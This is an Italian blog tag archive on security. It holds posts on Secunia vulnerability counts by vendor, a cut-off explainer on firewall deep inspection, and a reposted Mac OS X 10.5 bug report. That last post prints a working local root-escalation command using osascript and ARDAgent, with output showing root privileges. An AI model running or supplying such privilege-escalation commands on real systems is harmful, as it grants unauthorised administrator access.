Tag Archives: security

Chi produce più bugs?

Posted on by
Reply

Da una ricerca di Secunia dal 2005 al 2010 si è evidenziato che Apple e Oracle\SUN sono le due società che “producono” più vulnerabilità in tutto il mondo.

E’ da tenere in considerazione la grande differenza di software e prodotti creati tra Orace\SUN e Apple, considerando che Aplle procude meno software di Oracle si deduce immediatamente che Apple è la società che produce il software più insicuro dei ultimi 5 anni.

La ricerca si basa su valori pubblici (CVE) non su campagne di marketing, e riguardano la sicurezza del software che non è da confondere esclusivamente con la stabilità del sistema.

Per esempio facilmente qualcuno puo accedere come amministratore senza avere i diritti su Os X server, ma magari il server rispetto a Windows è più stabile!

Un po inquietante come cosa!

La terza societa è Microsoft che resta stabile negli anni ma anche questa produce molti piu software rispetto Apple!

Firewall e Deep Inspection

Posted on by
Reply

Nei ultimi anni ho sentito uscire dalla bocca di molte persone paroloni come “copper speed”, “deep inspection”, “pattern matching”, “intrusion detection and prevention” e cosi via..

Per non parlare dei confronti tra uno o altri podotti, che cercano in ogni modo di differenziarsi tra l’uno e l’altro proponendo le solite cose con nomi diversi e con una confusione tale da far credere di avere sempre qualcosa di piu innovativo.

Parlare quindi di “deep inspection” per chi non vuole vendervi niente si intende semplicemente di un sistema che in tempo reale decodifica i pacchetti in transito con lo scopo di identificare anomalie secondo delle regole di confronto.

E’ importante capire questo semplice concetto perch

Root escalation, osx 10.5. Peggio di windows?

Posted on by
1

Non mi esprimo e copio incollo semplicemente quello che è il bug..

mymac$ osascript -e ‘tell app “ARDAgent” to do shell script “id”‘;

uid=0(root)gid=0(wheel)egid=20(staff)groups=0(wheel),1(daemon),

2(kmem),8(procview),29(certusers),3(sys),9(procmod),4(tty),

5(operator),80(admin),20(staff)

fonte: http://it.slashdot.org/article.pl?sid=08/06/18/1919224&from=rss